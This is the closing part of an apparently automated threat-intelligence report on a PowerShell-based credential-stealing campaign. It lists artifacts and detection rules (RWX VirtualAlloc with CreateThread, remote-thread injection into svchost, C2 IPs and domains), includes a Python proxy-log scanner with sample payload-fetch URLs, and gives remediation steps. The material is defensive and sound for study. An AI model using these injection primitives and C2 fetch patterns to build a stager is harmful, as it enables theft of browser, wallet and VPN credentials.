%TEMP%\<random>.cs, .cmdline, .dll; csc.exe child of powershell.exe | Add-Type compiler artifacts (transient files, persistent process telemetry)
install.msi | Persistence installer
chromelevator.bin | Chrome injection module

Detection Guidance

PowerShell Monitoring (Stage 1)

Defenders should alert on the combination of these behaviors in a single PowerShell session (script block logging, Event ID 4104, is what records the decoded script text these checks need, so enable it before you need it):

  • Invoke-WebRequest downloading .bin files in the same session as Add-Type
  • VirtualAlloc + CreateThread P/Invoke via DllImport in a single script
  • Scripts containing both Marshal.Copy and CreateThread -- this pattern is almost exclusively malicious

Memory and Process Monitoring (Stages 2-4)

  • VirtualAlloc with PAGE_EXECUTE_READWRITE (protection value 0x40) followed by CreateThread to that allocation
  • SeDebugPrivilege token adjustment outside administrative tooling context (e.g., not from Task Manager, Process Explorer, or a debugger)
  • CreateRemoteThread targeting svchost.exe where the source process is not a system service
  • Any process named nsvchost.exe -- this is not a legitimate Windows binary

Network Detection

  • HTTP GET to a bare IP address (a Host header carrying an IP literal rather than a domain) with a WindowsPowerShell User-Agent requesting a binary file -- this pattern has near-zero legitimate use
  • HTTP requests matching the URI pattern ^/[0-9a-f]{16}/m_cpt.*\.bin$
  • Any traffic to 178.16.52[.]201 or the AS202412 IP ranges listed above
  • DNS queries for adobevault[.]top, wc-gateway[.]com, or any of the associated domains
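
An added example (not from the report's Suricata set) of those four network checks applied to proxy logs. The log format is a constructed tab-separated one (time, client, method, URL, status, User-Agent); adapt the split to your own proxy's fields. The IOC hosts, the URI regex and the three address ranges are the ones given in this report; the extensions it treats as payload fetches are an assumption (.bin and .msi, the two the chain pulls from the C2).

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators from the report.
IOC_HOSTS = {"178.16.52.201", "178.16.52.119", "adobevault.top", "wc-gateway.com"}
IOC_NETS = [ipaddress.ip_network(n) for n in ("178.16.52.0/24", "178.16.55.0/24", "91.92.240.0/22")]
CAMPAIGN_URI = re.compile(r"^/[0-9a-f]{16}/m_cpt[^/]*\.bin$")
PAYLOAD_EXT = (".bin", ".msi")   # assumption: the two file types the chain fetches

R_URI = "campaign URI pattern"
R_PS_BARE_IP = "PowerShell UA fetching payload from bare IP"
R_IOC_HOST = "known IOC host"
R_IOC_NET = "AS202412-associated range"


def _as_ip(host):
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def classify(url, user_agent):
    """Return the list of reasons one request matches the network guidance above."""
    parts = urlsplit(url)
    host, path = (parts.hostname or "").lower(), parts.path
    ip = _as_ip(host)
    reasons = []
    if CAMPAIGN_URI.match(path):
        reasons.append(R_URI)
    if ip and user_agent.startswith("WindowsPowerShell/") and path.lower().endswith(PAYLOAD_EXT):
        reasons.append(R_PS_BARE_IP)
    if host in IOC_HOSTS or host.endswith(".adobevault.top"):
        reasons.append(R_IOC_HOST)
    if ip and any(ip in net for net in IOC_NETS):
        reasons.append(R_IOC_NET)
    return reasons


def scan(log_lines):
    """Tab-separated proxy log (constructed format): time, client, method, url, status, user-agent."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        _ts, client, _method, url, _status, ua = line.rstrip("\n").split("\t")
        reasons = classify(url, ua)
        if reasons:
            hits.append({"line": n, "client": client, "url": url, "reasons": reasons})
    return hits


# Constructed sample traffic: two requests reproducing the chain, one hit on the
# lure, one stray hit on the auxiliary range, and two benign look-alikes.
SAMPLE_LOG = [
    "2026-03-16T03:20:11Z\t10.0.0.15\tGET\thttp://178.16.52.201/9cca20c6df659f72/m_cpt1267381.bin\t200\tWindowsPowerShell/5.1.19041.610",
    "2026-03-16T03:20:14Z\t10.0.0.15\tGET\thttp://178.16.52.201/9cca20c6df659f72/install.msi\t200\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)",
    "2026-03-16T03:21:02Z\t10.0.0.22\tGET\thttps://api.github.com/repos/PowerShell/PowerShell/releases/latest\t200\tWindowsPowerShell/5.1.19041.610",
    "2026-03-16T03:21:40Z\t10.0.0.22\tGET\thttp://192.0.2.9/firmware/update.bin\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "2026-03-16T03:22:05Z\t10.0.0.31\tGET\thttps://adobevault.top/360\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "2026-03-16T03:23:19Z\t10.0.0.40\tGET\thttp://91.92.243.149/\t403\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["line"], hit["client"], hit["url"], "; ".join(hit["reasons"]))
```

The two benign lines show why the checks are combined rather than applied singly: a PowerShell User-Agent talking to a domain, and a browser pulling a .bin from a bare IP, each trip one condition but neither produces a reason on its own.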

File-Based Detection

  • File creation of nsvchost.exe anywhere on the filesystem
  • The string sysinfo_aes256_channel_key_2024!! present in any binary
  • msiexec /i launched by a non-installer parent against an install.msi that was just written to disk by an HTTP download from a bare IP address

So What? -- What Defenders Should Do Now

Immediate (next 24-48 hours):

  • Block all IPs and domains listed in the IOC table at your perimeter firewall and DNS resolver
  • Search proxy/firewall logs for connections to 178.16.52[.]201 and adobevault[.]top -- any hits indicate active or historical compromise
  • Hunt for nsvchost.exe across your endpoint fleet
  • If you find the AES key string in any binary on your network, that host is compromised -- isolate immediately and begin IR

Short-term (next 1-2 weeks):

  • Deploy the YARA rules and Suricata signatures from this investigation (available in the full GHOST investigation package)
  • Pivot on the ECDSA host-key fingerprint 6f:1f:3b:94:fa:7f:a7:77:26:35:1a:b8:d9:78:f6:99 in internet-scan data (Shodan, Censys and similar index SSH host keys) to find further operator nodes; treat the hasshServer value 41ff3ecd1458b0bf86e1b4891636213e only as corroboration, since it fingerprints the SSH server build and algorithm list rather than the operator
  • Review browser credential stores on any potentially exposed endpoints -- the stealer targets Login Data, Cookies, and autofill across six browsers
  • Rotate credentials for any users whose endpoints may have been compromised, with priority on cryptocurrency wallets and VPN credentials

Medium-term (next 1-3 months):

  • Consider blocking AS202412 (Omegatech LTD) at the network level. The ratio of malicious to legitimate traffic on this ASN is extremely unfavorable
  • Enforce PowerShell Constrained Language Mode through AppLocker or WDAC on endpoints where full PowerShell is not operationally required; CLM refuses Add-Type and arbitrary P/Invoke, which are exactly the primitives Stage 1 depends on (setting CLM through an environment variable alone is not a security boundary)
  • Deploy behavioral rules for VirtualAlloc(RWX) + CreateThread patterns -- this catches not just this campaign but the entire class of shellcode stagers that rely on this technique
  • Monitor Certificate Transparency logs for new certificates on adobevault[.]top and *.adobevault[.]top -- a wildcard cert was issued in February 2026, indicating the operator is expanding the infrastructure

The operator has been active since at least October 2025 and shows no signs of slowing down. The infrastructure is expanding, the tooling is functional if not sophisticated, and the target list -- browser credentials, cryptocurrency wallets, VPN credentials, and screenshots -- covers the highest-value data categories for financial cybercrime. The only thing working in defenders' favor is that this operator makes mistakes. The question is whether you find the evidence before or after they find your users' credentials.


This investigation was conducted by GHOST, the automated threat intelligence engine at Breakglass Intelligence. The full investigation package -- including STIX 2.1 bundle, YARA rules, and Suricata signatures -- is available at intel.breakglass.tech.
